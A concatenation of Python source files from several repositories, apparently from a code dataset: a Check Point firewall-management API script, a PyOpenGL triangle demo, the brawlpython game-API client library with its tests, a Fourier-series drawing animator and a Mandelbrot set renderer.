'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"add-access-section", json=payload_list, headers=headers, verify=False)
return response
def delete_access_section_by_name(sid,url,layer,name):
payload_list={}
payload_list['name']=name
payload_list['layer']=layer
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"delete-access-section", json=payload_list, headers=headers, verify=False)
return response
def show_access_section(sid,url,layer,name):
payload_list={}
payload_list['layer']=layer
payload_list['name']=name
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"show-access-section", json=payload_list, headers=headers, verify=False)
return response
def add_access_rule(sid,url,layer,position,rule):
payload_list={}
payload_list['layer']=layer
payload_list['position']=position
payload_list['name']=rule['name']
payload_list['source']=rule['source']
payload_list['destination']=rule['destination']
payload_list['service']=rule['service']
payload_list['track']=rule['track']
payload_list['action']=rule['action']
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"add-access-rule", json=payload_list, headers=headers, verify=False)
return response
def delete_access_rule_by_rule_number(sid,url,layer,number):
payload_list={}
payload_list['layer']=layer
payload_list['rule-number']=number
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"delete-access-rule", json=payload_list, headers=headers, verify=False)
return response
def delete_access_rule_by_rule_name(sid,url,layer,name):
payload_list={}
payload_list['layer']=layer
payload_list['name']=name
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"delete-access-rule", json=payload_list, headers=headers, verify=False)
return response
def publish(sid,url):
payload_list={}
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"publish", json=payload_list, headers=headers, verify=False)
return response
def add_range(sid,url):
    # NOTE: unfinished stub - the endpoint and payload below still mirror publish();
    # they presumably need to be replaced with the real call (e.g. "add-address-range") and its payload.
    payload_list={}
    headers = {
        'content-type': "application/json",
        'Accept': "*/*",
        'x-chkp-sid': sid,
    }
    response = requests.post(url+"publish", json=payload_list, headers=headers, verify=False)
    return response
def show_task(sid,url,task):
payload_list={}
payload_list['task-id']=task
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"show-task", json=payload_list, headers=headers, verify=False)
return response
def logout(sid,url):
payload_list={}
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"logout", json=payload_list, headers=headers, verify=False)
return response
#main program
#login and get the session id
#sid=login(url,user,pw)
#get all groups
#add policy package
#name="my_cpx_policy2"
#comments="created by automation script"
#access_layer="true"
#threat_layer="true"
#package_return=add_policy_package(sid,url,name,access_layer,threat_layer,comments)
#print package_return
#add access rule section
#layer="my_cpx_policy2 network"
#position="top"
#position={"above":"Cleanup rule"}
#name="section1 - created by automation2"
#show_section_return=show_access_section(sid,url,layer,name)
#show_section_return=show_access_section(sid,url,layer,name)
#if show_section_return.status_code == "200":
# print "section already exists skipping"
#else:
# add_access_section(sid,url,layer,position,name)
#add access rule
#layer="my_cpx_policy2 network"
#position="top"
#rule={}
#rule['source']="any"
#rule['destination']="any"
#rule['service']="http"
#rule['action']="accept"
#rule['track']="Network Log"
#rule['name']="my rule 1"
#rule_response=add_access_rule(sid,url,layer,position,rule)
#print json.loads(rule_response.text)
#print rule_response
#add access rule to section
#layer="my_cpx_policy2 network"
#position={"top":"section1 - created by automation"}
#rule={}
#rule['source']="any"
#rule['destination']="any"
#rule['service']=["https","http"]
#rule['action']="accept"
#rule['track']="Network Log"
#rule['name']="my rule 2"
#rule_response=add_access_rule(sid,url,layer,position,rule)
#print rule_response
#print json.loads(rule_response.text)
#publish
#publish(sid,url)
``` |
{
"source": "0dj0bz/hn-vis",
"score": 3
} |
#### File: hn-vis/openGL/test.py
```python
import OpenGL.GL as GL
import OpenGL.GL.shaders
import ctypes
import pygame
import numpy
vertex_shader = """
#version 330
in vec4 position;
void main()
{
gl_Position = position;
}
"""
fragment_shader = """
#version 330
void main()
{
gl_FragColor = vec4(1.0f, 1.0f, 1.0f, 1.0f);
}
"""
vertices = [ 0.6, 0.6, 0.0, 1.0,
-0.6, 0.6, 0.0, 1.0,
0.0, -0.6, 0.0, 1.0]
vertices = numpy.array(vertices, dtype=numpy.float32)
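# 3 vertices x 4 float32 components (x, y, z, w) = 48 bytes, matching the size
# passed to glBufferData in create_object below.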
def create_object(shader):
# Create a new VAO (Vertex Array Object) and bind it
vertex_array_object = GL.glGenVertexArrays(1)
GL.glBindVertexArray( vertex_array_object )
# Generate buffers to hold our vertices
vertex_buffer = GL.glGenBuffers(1)
GL.glBindBuffer(GL.GL_ARRAY_BUFFER, vertex_buffer)
# Get the position of the 'position' in parameter of our shader and bind it.
position = GL.glGetAttribLocation(shader, 'position')
GL.glEnableVertexAttribArray(position)
# Describe the position data layout in the buffer
GL.glVertexAttribPointer(position, 4, GL.GL_FLOAT, False, 0, ctypes.c_void_p(0))
# Send the data over to the buffer
GL.glBufferData(GL.GL_ARRAY_BUFFER, 48, vertices, GL.GL_STATIC_DRAW)
# Unbind the VAO first (Important)
GL.glBindVertexArray( 0 )
# Unbind other stuff
GL.glDisableVertexAttribArray(position)
GL.glBindBuffer(GL.GL_ARRAY_BUFFER, 0)
return vertex_array_object
def display(shader, vertex_array_object):
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glUseProgram(shader)
GL.glBindVertexArray( vertex_array_object )
GL.glDrawArrays(GL.GL_TRIANGLES, 0, 3)
GL.glBindVertexArray( 0 )
GL.glUseProgram(0)
def main():
pygame.init()
screen = pygame.display.set_mode((512, 512), pygame.OPENGL|pygame.DOUBLEBUF)
GL.glClearColor(0.5, 0.5, 0.5, 1.0)
GL.glEnable(GL.GL_DEPTH_TEST)
shader = OpenGL.GL.shaders.compileProgram(
OpenGL.GL.shaders.compileShader(vertex_shader, GL.GL_VERTEX_SHADER),
OpenGL.GL.shaders.compileShader(fragment_shader, GL.GL_FRAGMENT_SHADER)
)
vertex_array_object = create_object(shader)
clock = pygame.time.Clock()
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
return
if event.type == pygame.KEYUP and event.key == pygame.K_ESCAPE:
return
display(shader, vertex_array_object)
pygame.display.flip()
if __name__ == '__main__':
try:
main()
finally:
pygame.quit()
``` |
{
"source": "0dminnimda/brawlpython",
"score": 2
} |
#### File: brawlpython/brawlpython/api_toolkit.py
```python
from . import __version__, __name__
from .typedefs import STRDICT
from .cache_utils import somecachedmethod, iscorofunc
from asyncio import ensure_future as ensure, gather
from collections.abc import ByteString, Collection, Mapping, Sized
from functools import update_wrapper
import sys
from typing import Dict, Union
__all__ = (
"default_headers",
"make_headers",
"isliterals",
"iscollection",
"issized",
"isunit",
"isempty",
"ismapping",
"isrequiredcollection",
"same",
"unique",
"prepare_param",
"check_params",
"_rearrange_params",
"rearrange_params",
"_rearrange_args",
"rearrange_args",
"multiparams",
"add_api_name")
def default_headers() -> STRDICT:
return {
"dnt": "1",
"user-agent": f"{__name__}/{__version__} (Python {sys.version[:5]})",
"accept-encoding": ", ".join(("gzip", "deflate")),
"cache-control": "no-cache",
"pragma": "no-cache",
# "content-encoding": "utf-8",
}
def make_headers(api_key: str) -> STRDICT:
return {"authorization": f"Bearer {api_key}"}
def isliterals(obj):
return isinstance(obj, (str, ByteString))
def iscollection(obj):
return isinstance(obj, Collection)
def issized(obj):
return isinstance(obj, Sized)
def isunit(obj):
return issized(obj) and len(obj) == 1
def isempty(obj):
return issized(obj) and len(obj) == 0
def ismapping(obj):
return isinstance(obj, Mapping)
def isrequiredcollection(obj):
return (
iscollection(obj)
and not isliterals(obj)
and not ismapping(obj)
and not isempty(obj))
def same(elements):
return len(elements) == elements.count(elements[0])
def unique(x):
seen = list()
return not any(i in seen or seen.append(i) for i in x)
def prepare_param(param, lengths):
if isrequiredcollection(param):
if isunit(param):
return ("u", param[0])
else:
lengths.append(len(param))
return ("m", iter(param))
else:
return ("u", param)
def check_params(args, kwargs):
lengths = []
args = [prepare_param(param, lengths) for param in args]
kwargs = {
key: prepare_param(param, lengths) for key, param in kwargs.items()}
if len(lengths) < 1:
total_length = 1
else:
if not same(lengths):
raise ValueError(
"All allowed iterable parameters must be of the same length.")
total_length = lengths[0]
return args, kwargs, total_length
def _rearrange_params(args, kwargs):
new_args, new_kwargs, length = check_params(args[:], kwargs.copy())
for _ in range(length):
current_args = []
for (kind, val) in new_args:
if kind == "m":
val = next(val)
current_args.append(val)
current_kwargs = {}
for key, (kind, val) in new_kwargs.items():
if kind == "m":
val = next(val)
current_kwargs[key] = val
yield tuple(current_args), current_kwargs
def rearrange_params(*args, **kwargs):
return _rearrange_params(args, kwargs)
def _rearrange_args(args):
for a, kw in _rearrange_params(args, {}):
yield a
def rearrange_args(*args):
return _rearrange_args(args)
def multiparams(func):
if iscorofunc(func):
async def wrapper(*args, **kwargs):
params = _rearrange_params(args, kwargs)
tasks = [ensure(func(*a, **kw)) for a, kw in params]
return await gather(*tasks)
else:
def wrapper(*args, **kwargs):
params = _rearrange_params(args, kwargs)
return [func(*a, **kw) for a, kw in params]
return update_wrapper(wrapper, func)
```
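A minimal usage sketch, not part of the original module, showing how `rearrange_params` and `multiparams` broadcast iterable parameters; the import path is assumed from the file layout above.
```python
# Sketch only: unit values are repeated, non-literal collections are zipped.
from brawlpython.api_toolkit import rearrange_params, multiparams

pairs = list(rearrange_params("players", tag=["#AAA", "#BBB"]))
# -> [(("players",), {"tag": "#AAA"}), (("players",), {"tag": "#BBB"})]

@multiparams
def fetch(path, tag):
    return f"{path}:{tag}"

print(fetch("players", tag=["#AAA", "#BBB"]))  # ["players:#AAA", "players:#BBB"]
```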
#### File: brawlpython/brawlpython/clients.py
```python
import asyncio
from .api import (
default_api_dict, API, KINDS, KIND_VALS, KIND_KEYS,
OFFIC, CHI, STAR, OFFICS, UNOFFICS,
)
from .api_toolkit import rearrange_params, _rearrange_args
from .base_classes import AsyncInitObject, AsyncWith, SyncWith
from .cache_utils import iscorofunc
from .sessions import AsyncSession, SyncSession
from configparser import ConfigParser
from functools import update_wrapper
from types import TracebackType
from typing import (
Any,
Callable,
Coroutine,
Dict,
Generator,
Iterable,
Generic,
List,
Mapping,
Optional,
Sequence,
Set,
Tuple,
Type,
TypeVar,
Union,
)
from .typedefs import (STRS, JSONSEQ, JSONS, HANDLER,
NUMBER, INTSTR, BOOLS, STRDICT, AKW)
import time
__all__ = (
"AsyncClient",
"SyncClient",
"offic_gets_handler",
"star_gets_handler",
"gets_handler")
COLLECT = "collect"
RELEASE = "release"
DEFAULT = "default"
def offic_gets_handler(data_list: JSONSEQ) -> JSONSEQ:
results = []
for data in data_list:
get_items = data.get("items")
if get_items is not None and isinstance(get_items, list):
results.append(get_items)
else:
results.append(data)
return results
def star_gets_handler(data_list: JSONSEQ) -> JSONSEQ:
results = []
for data in data_list:
data.pop("status", None)
if len(data) == 1:
results += list(data.values())
else:
results.append(data)
return results
def gets_handler(self, data_list: JSONSEQ) -> JSONSEQ:
name = self._current_api
if name in OFFICS:
res = offic_gets_handler(data_list)
elif name == STAR:
res = star_gets_handler(data_list)
else:
res = data_list
if self._return_unit and len(res) == 1:
return res[0]
return res
def _find_save(self, kind: str, match: INTSTR,
parameter: str = None) -> Optional[JSONS]:
collectable = self._saves[kind]
count = len(collectable)
if isinstance(match, int):
if -count <= match < count:
return collectable[match]
elif isinstance(match, str):
match = match.upper()
if parameter is None:
for part in collectable:
if match in part.values():
return part
else:
for part in collectable:
if part.get(parameter) == match:
return part
return None # returns explicitly
def _rankings(self, kind: str, api: str,
key: Optional[INTSTR] = None,
code: str = "global",
limit: INTSTR = 200) -> JSONS:
if kind in KIND_KEYS:
kind = KINDS[kind]
if kind == KINDS["b"]:
if key is None:
raise ValueError(
"If the kind is b or brawlers, the key must be entered")
brawler = self.find_save("b", key)
if brawler is not None:
key = brawler["id"]
elif kind == KINDS["ps"]:
if key is None:
key = -1
powerplay = self.find_save("ps", key)
if powerplay is not None:
key = powerplay["id"]
if key is None:
key = ""
return ("rankings",), {"code": code, "kind": kind,
"id": key, "limit": limit}
def get_and_apply_api_keys(filename: str, section: str,
api_dict: Dict[str, API]) -> None:
if filename.endswith(".env"):
raise ValueError("this file extension is not accepted")
# if filename.endswith(".ini"):
config = ConfigParser()
config.read(filename)
config = config[section]
for name, api in api_dict.items():
if name in OFFICS:
name = OFFIC
api_key = config.get(name + "_api_key")
api.set_api_key(api_key)
class AsyncClient(AsyncInitObject, AsyncWith):
_gets_handler = gets_handler
async def __init__(
self, # api_keys: Union[str, STRDICT],
config_file_name: str = "config.ini",
section: str = "DEFAULT",
api_dict: Dict[str, API] = {},
default_api: str = OFFIC,
return_unit: bool = True,
min_update_time: NUMBER = 60 * 10,
data_handler: HANDLER = gets_handler,
trust_env: bool = True,
cache_ttl: NUMBER = 60,
cache_limit: int = 1024,
use_cache: bool = True,
timeout: NUMBER = 30,
repeat_failed: int = 3) -> None:
self.session = await AsyncSession(
trust_env=trust_env, cache_ttl=cache_ttl,
cache_limit=cache_limit, use_cache=use_cache,
timeout=timeout, repeat_failed=repeat_failed)
self.api_dict = {**default_api_dict, **api_dict}
get_and_apply_api_keys(config_file_name, section, self.api_dict)
self._current_api = self._default_api = default_api
self._return_unit = return_unit
self._gets_handler = data_handler
self._requests = []
self._mode = DEFAULT
self._saves = {}
self._min_update_time = min_update_time
await self.update_saves(True)
async def close(self) -> None:
"""Close session"""
await self.session.close()
@property
def closed(self) -> bool:
"""Is client session closed.
A readonly property.
"""
return self.session.closed
async def _gets(self, *args) -> JSONSEQ:
# not_collect =
resps = await self.session.gets(*args)
if self.session.mode != COLLECT:
            # match SyncClient: the handler expects the client instance first
            return self._gets_handler(self, resps)
if self.session.mode == RELEASE:
return resps # None
def _get_api(self, api: str):
return self.api_dict[api]
async def _fetchs(self, paths: STRS, api_names: str,
from_json: BOOLS = True, rearrange: bool = True,
**kwargs) -> JSONS:
if rearrange:
urls = []
headers = []
pars = rearrange_params(api_names, paths, **kwargs)
for (api_name, *a), kw in pars:
api = self._get_api(api_name)
urls.append(api.make_url(*a, **kw))
headers.append(
(api.headers)) # self.session.headers_handler
else:
api = self._get_api(api_names)
urls = api.make_url(paths, **kwargs)
headers = self.session.headers_handler(api.headers)
return await self._gets(urls, from_json, headers)
def collect(self):
self.session.collect()
async def release(self):
return self._gets_handler(await self.session.release())
# @add_api_name(None)
async def test_fetch(self, *args, **kwargs):
return await self._fetchs(*args, **kwargs)
async def players(self, tag: str, api: str = OFFIC) -> JSONS:
return await self._fetchs("players", api, tag=tag)
async def battlelog(self, tag: str, api: str = OFFIC) -> JSONS:
return await self._fetchs("battlelog", api, tag=tag)
async def clubs(self, tag: str, api: str = OFFIC) -> JSONS:
return await self._fetchs("clubs", api, tag=tag)
async def members(self, tag: str, limit: INTSTR = 100,
api: str = OFFIC) -> JSONS:
return await self._fetchs("members", api, tag=tag, limit=limit)
async def rankings(self, kind: str,
key: Optional[INTSTR] = None,
code: str = "global",
limit: INTSTR = 200,
api: str = OFFIC) -> JSONS:
pars = rearrange_params(kind, api, key=key, code=code, limit=limit)
self.collect()
for args, kwargs in pars:
a, kw = _rankings(self, *args, **kwargs)
await self._fetchs(*a, rearrange=False, **kw)
return await self.release()
async def brawlers(self, id: INTSTR = "", limit: Optional[INTSTR] = None,
api: str = OFFIC) -> JSONS:
return await self._fetchs("brawlers", api, id=id, limit=limit)
async def powerplay(self, code: str = "global", limit: int = 200,
api: str = OFFIC) -> JSONS:
return await self._fetchs("rankings", api, code=code, limit=limit,
kind=KINDS["ps"])
async def events(self, api: str = STAR) -> JSONS:
return await self._fetchs("events", api)
async def icons(self, api: str = STAR) -> JSONS:
return await self._fetchs("icons", api)
async def maps(self, id: INTSTR = "", api: str = STAR) -> JSONS:
return await self._fetchs("maps", api, id=id)
async def gamemodes(self, api: str = STAR) -> JSONS:
return await self._fetchs("gamemodes", api)
async def clublog(self, tag: str, api: str = STAR) -> JSONS:
return await self._fetchs("clublog", api, tag=tag)
async def translations(self, code: str = "", api: str = STAR) -> JSONS:
return await self._fetchs("translations", api, code=code)
# TODO: api rearrange
async def update_saves(self, now: bool = False, api: str = OFFIC) -> None:
if now or time.time() - self._last_update >= self._min_update_time:
self.collect()
await self.brawlers(api=api)
await self.powerplay(api=api)
b, ps = await self.release()
self._saves.update({"b": b, "ps": ps})
self._last_update = time.time()
find_save = _find_save
class SyncClient(SyncWith):
def __init__(
self, api_keys: Union[str, STRDICT],
api_dict: Dict[str, API] = {},
            default_api: str = OFFIC,
return_unit: bool = True,
min_update_time: NUMBER = 60 * 10,
data_handler: HANDLER = gets_handler,
trust_env: bool = True,
cache_ttl: NUMBER = 60,
cache_limit: int = 1024,
use_cache: bool = True,
timeout: NUMBER = 30,
repeat_failed: int = 3) -> None:
self.session = SyncSession(
trust_env=trust_env, cache_ttl=cache_ttl,
cache_limit=cache_limit, use_cache=use_cache,
timeout=timeout, repeat_failed=repeat_failed
)
self.api_dict = {**default_api_dict, **api_dict}
        self._current_api = self._default_api = default_api
if isinstance(api_keys, str):
self.api_dict[default_api].set_api_key(api_keys)
else:
for name, api_key in api_keys.items():
self.api_dict[name].set_api_key(api_key)
self._return_unit = return_unit
self._gets_handler = data_handler
self._saves = {}
self._min_update_time = min_update_time
self.update_saves(True)
def close(self) -> None:
"""Close session"""
self.session.close()
@property
def closed(self) -> bool:
"""Is client session closed.
A readonly property.
"""
return self.session.closed
def _gets(self, *args: Any, **kwargs: Any) -> JSONSEQ:
resps = self.session.gets(*args, **kwargs)
return self._gets_handler(self, resps)
def _get_api(self):
if self._current_api is None:
self._current_api = self._default_api
return self.api_dict[self._current_api]
def _fetch(self, path: str, from_json: bool = True,
**kwargs: Any) -> JSONS:
api = self._get_api()
return self._gets(
api.get(path, **kwargs), headers=api.headers, from_json=from_json)
def _fetchs(self, paths: Union[STRS, AKW], from_json: BOOLS = True,
rearrange: bool = True, **kwargs: Any) -> JSONS:
api = self._get_api()
if rearrange:
pars = rearrange_params(paths, **kwargs)
else:
pars = paths
urls = [api.get(*a, **kw) for a, kw in pars]
return self._gets(urls, headers=api.headers, from_json=from_json)
# @add_api_name(None)
def test_fetch(self, *args, **kwargs):
return self._fetchs(*args, **kwargs)
# @add_api_name(OFFIC)
def players(self, tag: str) -> JSONS:
return self._fetchs("players", tag=tag)
# @add_api_name(OFFIC)
def battlelog(self, tag: str) -> JSONS:
return self._fetchs("battlelog", tag=tag)
# @add_api_name(OFFIC)
def clubs(self, tag: str) -> JSONS:
return self._fetchs("clubs", tag=tag)
# @add_api_name(OFFIC)
def members(self, tag: str, limit: INTSTR = 100) -> JSONS:
return self._fetchs("members", tag=tag, limit=limit)
# @add_api_name(OFFIC)
def rankings(self, kind: str,
key: Optional[INTSTR] = None,
code: str = "global",
limit: INTSTR = 200) -> JSONS:
pars = rearrange_params(
kind, key=key, code=code, limit=limit)
return self._fetchs(
[_rankings(self, *a, **kw) for a, kw in pars], rearrange=False)
# @add_api_name(OFFIC)
def brawlers(self, id: INTSTR = "",
limit: INTSTR = "") -> JSONS:
return self._fetchs("brawlers", id=id, limit=limit)
# @add_api_name(OFFIC)
def powerplay(self, code: str = "global", limit: int = 200) -> JSONS:
return self._fetchs("rankings", code=code, limit=limit,
kind=KINDS["ps"], id="")
# @add_api_name(STAR)
def events(self) -> JSONS:
return self._fetchs("events")
# @add_api_name(STAR)
def icons(self) -> JSONS:
return self._fetchs("icons")
# @add_api_name(STAR)
    def maps(self, id: INTSTR = "") -> JSONS:
return self._fetchs("maps", id=id)
# @add_api_name(STAR)
def gamemodes(self) -> JSONS:
return self._fetchs("gamemodes")
# @add_api_name(STAR)
def clublog(self, tag: str) -> JSONS:
return self._fetchs("clublog", tag=tag)
# @add_api_name(STAR)
def translations(self, code: str = "") -> JSONS:
return self._fetchs("translations", code=code)
# @add_api_name(OFFIC)
def update_saves(self, now: bool = False) -> None:
if now or time.time() - self._last_update >= self._min_update_time:
self._saves.update({
"b": self.brawlers(api=self._current_api),
"ps": self.powerplay(api=self._current_api)
})
self._last_update = time.time()
find_save = _find_save
```
#### File: brawlpython/tests/test_async_client.py
```python
import asyncio
from brawlpython import AsyncClient
from brawlpython.api_toolkit import unique, same
from brawlpython.cache_utils import iscoro
from configobj import ConfigObj
import pytest
url_uuid = "http://httpbin.org/uuid"
config = ConfigObj("config.ini")
api_key = config["DEFAULT"].get("API_KEY")
@pytest.fixture
def factory(loop):
client = None
async def maker(*args, **kwargs):
nonlocal client
client = await AsyncClient(*args, **kwargs)
return client
yield maker
if client is not None:
loop.run_until_complete(client.close())
@pytest.fixture
def client(factory, loop):
return loop.run_until_complete(factory(api_key))
async def test_async_init():
client = AsyncClient(api_key)
assert iscoro(client)
assert isinstance(await client, AsyncClient)
async def test_closing(client):
assert not client.closed
for _ in 1, 2:
await client.close()
assert client.closed
async def no_test_cache(client):
responses = [await client._get(url_uuid) for _ in range(2)]
assert same(responses)
await asyncio.sleep(2)
assert await client._get(url_uuid) != responses[0]
async def no_test_no_cache(factory):
client = await factory(api_key, use_cache=False)
assert unique([await client._get(url_uuid) for _ in range(2)])
assert unique(await client._gets([url_uuid] * 2))
# FIXME: complete test
async def test_data_handler(factory):
client = await factory(api_key, data_handler=lambda *x: None)
await client._get(url_uuid)
if __name__ == "__main__":
import run_tests
run_tests.run(__file__)
```
#### File: brawlpython/tests/test_async_session.py
```python
import pytest
import asyncio
from brawlpython.sessions import AsyncSession
from brawlpython.api_toolkit import unique, same
from brawlpython.cache_utils import iscoro
from configobj import ConfigObj
url_uuid = "http://httpbin.org/uuid"
# @pytest.yield_fixture
# def api_key():
config = ConfigObj("config.ini")
api_key = config["DEFAULT"].get("API_KEY")
@pytest.fixture
def factory(loop):
client = None
async def maker(*args, **kwargs):
nonlocal client
client = await AsyncSession(*args, **kwargs)
return client
yield maker
if client is not None:
loop.run_until_complete(client.close())
@pytest.fixture
def client(factory, loop):
return loop.run_until_complete(factory(api_key, cache_ttl=1))
async def test_async_init():
client = AsyncSession(api_key)
assert iscoro(client)
assert isinstance(await client, AsyncSession)
async def test_closing(client):
assert not client.closed
for _ in 1, 2:
await client.close()
assert client.closed
async def test_cache(client):
responses = [await client.get(url_uuid) for _ in range(2)]
assert same(responses)
await asyncio.sleep(2)
assert await client.get(url_uuid) != responses[0]
async def test_no_cache(factory):
client = await factory(api_key, use_cache=False)
assert unique([await client.get(url_uuid) for _ in range(2)])
assert unique(await client.gets([url_uuid] * 2))
if __name__ == "__main__":
import run_tests
run_tests.run(__file__)
``` |
{
"source": "0dminnimda/fourier-series",
"score": 3
} |
#### File: fourier-series/complex_fourier_series/animator.py
```python
from typing import List, Tuple, Union
import pygame as pg
from pygame.locals import K_ESCAPE, KEYDOWN, QUIT
from pygame.math import Vector2
from .series import Series
from .svg_handling import FLOAT_TO_COMPLEX, create_path_function_from_file
__all__ = (
"BLACK",
"VECTOR_COLOR",
"VECTOR_WIDTH",
"PATH_COLOR",
"PATH_WIDTH",
"main_loop",
"draw",
"draw_arrow",
"draw_path",
"complex_to_tuple")
BLACK = (0, 0, 0)
VECTOR_COLOR = (255, 0, 0)
VECTOR_WIDTH = 1
PATH_COLOR = (0, 255, 0)
PATH_WIDTH = 1
def main_loop(size: Tuple[int, int], path_func: FLOAT_TO_COMPLEX,
quantity: int, time_divider: Union[int, float], ):
display = pg.display.set_mode(size)
series: Series = Series()
series.create_formulas(quantity, path_func)
time: int = 0
path: List[Vector2] = []
offset: complex = complex(*size) / 2
while 1:
for event in pg.event.get():
if event.type == QUIT:
return None
if event.type == KEYDOWN:
if event.key == K_ESCAPE:
return None
display.fill(BLACK)
draw(display, series, offset, time/time_divider, path)
time += 1
pg.display.flip()
if time == int(2 * time_divider):
time = 0
del path[:int(time_divider)]
def draw(display: pg.Surface, series: Series, offset: complex,
time: float, path: List[complex]) -> None:
values: List[complex] = series.evaluate_all(time)
current_value: complex = 0j
for value in values:
new_value: complex = current_value + value
draw_arrow(display,
current_value + offset,
new_value + offset)
current_value = new_value
path.append(Vector2(
complex_to_tuple(current_value + offset)))
draw_path(display, path)
def draw_arrow(display: pg.Surface,
from_val: complex,
to_val: complex) -> None:
pg.draw.line(display,
VECTOR_COLOR,
complex_to_tuple(from_val),
complex_to_tuple(to_val),
VECTOR_WIDTH)
def draw_path(display: pg.Surface,
path: List[Vector2]) -> None:
if len(path) < 2:
return
pg.draw.aalines(display, PATH_COLOR, False, path) # PATH_WIDTH,
def complex_to_tuple(value: complex) -> Tuple[float, float]:
return ((value.real), (value.imag))
```
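A hedged wiring sketch, not from the repository, that drives `main_loop` with a hand-written closed path instead of an SVG file; it assumes the package is importable as `complex_fourier_series` and that pygame and quadpy are installed.
```python
import pygame as pg

from complex_fourier_series.animator import main_loop

def square_path(t: float) -> complex:
    # trace a 200x200 square centred at the origin as t runs from 0 to 1
    t *= 4
    if t < 1:
        return complex(-100 + 200 * t, -100)
    if t < 2:
        return complex(100, -100 + 200 * (t - 1))
    if t < 3:
        return complex(100 - 200 * (t - 2), 100)
    return complex(-100, 100 - 200 * (t - 3))

if __name__ == "__main__":
    pg.init()
    try:
        main_loop((512, 512), square_path, quantity=11, time_divider=200)
    finally:
        pg.quit()
```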
#### File: fourier-series/complex_fourier_series/series.py
```python
from cmath import exp, tau
from typing import List
import numpy as np
from quadpy import quad
from .svg_handling import FLOAT_TO_COMPLEX
TAU_I: complex = tau * 1j
def create_nth_constant_function(
n: int, path_func: FLOAT_TO_COMPLEX) -> FLOAT_TO_COMPLEX:
def f(t: float) -> complex:
return path_func(t) * exp(-n * TAU_I * t)
return f
def calculate_nth_constant(
n: int, constant_func: FLOAT_TO_COMPLEX) -> complex:
def array_f(array: np.array):
return np.array(list(map(constant_func, array)))
return quad(array_f, 0., 1., limit=30000)[0]
def create_nth_series_function(
n: int, nth_constant: complex) -> FLOAT_TO_COMPLEX:
def f(t: float) -> complex:
return nth_constant * exp(n * TAU_I * t)
return f
def get_frequency_by_index(index: int) -> int:
"""
-> 0 1 2 3 4 5 6 7 8 ...
<- 0 1 -1 2 -2 3 -3 4 -4 ...
"""
sign: int = -1 if index % 2 == 0 else 1
return ((index + 1) // 2) * sign
class Series:
__slots__ = "_formulas",
def __init__(self) -> None:
self._formulas: List[FLOAT_TO_COMPLEX] = []
def create_formulas(
self, quantity: int, path_func: FLOAT_TO_COMPLEX) -> None:
self._formulas.clear()
for i in range(quantity):
n = get_frequency_by_index(i)
constant_func: FLOAT_TO_COMPLEX = (
create_nth_constant_function(
n, path_func))
constant: complex = (
calculate_nth_constant(
n, constant_func))
self._formulas.append(
create_nth_series_function(
n, constant))
def evaluate_all(self, time: float) -> List[complex]:
return [
formula(time)
for formula in self._formulas
]
``` |
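A rough numerical check, assuming the same package layout and an installed quadpy: for a pure unit-circle path only the n = 1 coefficient is non-zero, so a small partial sum should already reproduce the path.
```python
from cmath import exp, tau

from complex_fourier_series.series import Series

def circle_path(t: float) -> complex:
    return exp(tau * 1j * t)

series = Series()
series.create_formulas(5, circle_path)    # frequencies 0, 1, -1, 2, -2
approx = sum(series.evaluate_all(0.25))   # partial sum at t = 0.25
print(abs(approx - circle_path(0.25)))    # expected to be close to 0
```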
{
"source": "0dminnimda/mondebrot_painter",
"score": 3
} |
#### File: mondebrot_painter/2019/offic.py
```python
import cv2 as cv
import time
import numpy as np
import multiprocessing as mp
from multiprocessing import Process
from math import sqrt
def st(z):
r = z[0]**2-(z[1]**2)
i = z[0]*z[1]*2
return r, i
def f(z, c):
s = st(z)
r = s[0]+c[0]
i = s[1]+c[1]
return r, i
def mon(r, i, n=100):
z = (0, 0)
c = (r, i)
try:
for i in range(n):
z = f(z, c)
except OverflowError:
p = False
else:
p = True
return p
def drmon(qlt, devi1, dell, part, qq=0):
part -= 1
# qlt*=2
sqq = sqrt(qlt)
de = 100*qlt
h1 = de*-1.25
v1 = de*-2.1 # qlt*185
hr, vr = (250/devi1)*qlt+1, (265/dell)*qlt
v1 += vr*part
#print(-h1+(h1+hr), -v1+(v1+vr), qlt, devi1, dell, part)
h1, v1, de, hr, vr = int(h1), int(v1), int(de), int(hr), int(vr)
#print(-h1+(h1+hr), -v1+(v1+vr), qlt, devi1, dell, part)
ww = [[[None, i/de, j/de] for j in range(h1, h1+hr)] for i in range(v1, v1+vr)]
for i in ww:
for j in i:
j[0] = mon(j[1], j[2])
if qq != 0:
qq.put(ww)
else:
return ww
def funccol(qlt, mode, dell):
ran = range(1, dell+1)
qq, pr, w, wg = {}, {}, {}, []
for i in ran:
qq[i] = mp.Queue()
pr[i] = Process(target=drmon, args=([qlt, mode, dell, i, qq[i]]))
pr[i].start()
for i in ran:
w[i] = qq[i].get()
wg += w[i]
pr[i].join()
return wg
def myar_to_img(w, fcolor, scolor, mode):
hei = len(w)*1
wid = len(w[0])*1
ar1 = np.zeros((hei, wid, 3), np.uint8)
ar1[:] = fcolor
ar = np.zeros((hei*2, wid*2, 3), np.uint8)
ii = -1
for i in w:
ii += 1
jj = -1
for j in i:
jj += 1
if j[0] is True:
ar1[ii][jj] = scolor
ar2 = np.copy(ar1)
for i in range(len(ar2)):
ar2[i][::] = ar2[i][::-1]
ar1 = ar1[0:len(ar1), 0:len(ar1[0])-1]
ar = np.concatenate((ar1, ar2), axis=1)
if mode == 1:
return ar2
elif mode == 2:
return ar
else:
return "error"
if __name__ == '__main__':
#for i in range(1,11):
# drmon(2**i,2,1,1)
factor = 0
while 1:
factor += 1 # quality factor
start_0 = time.time()
qual = 2**factor # quality
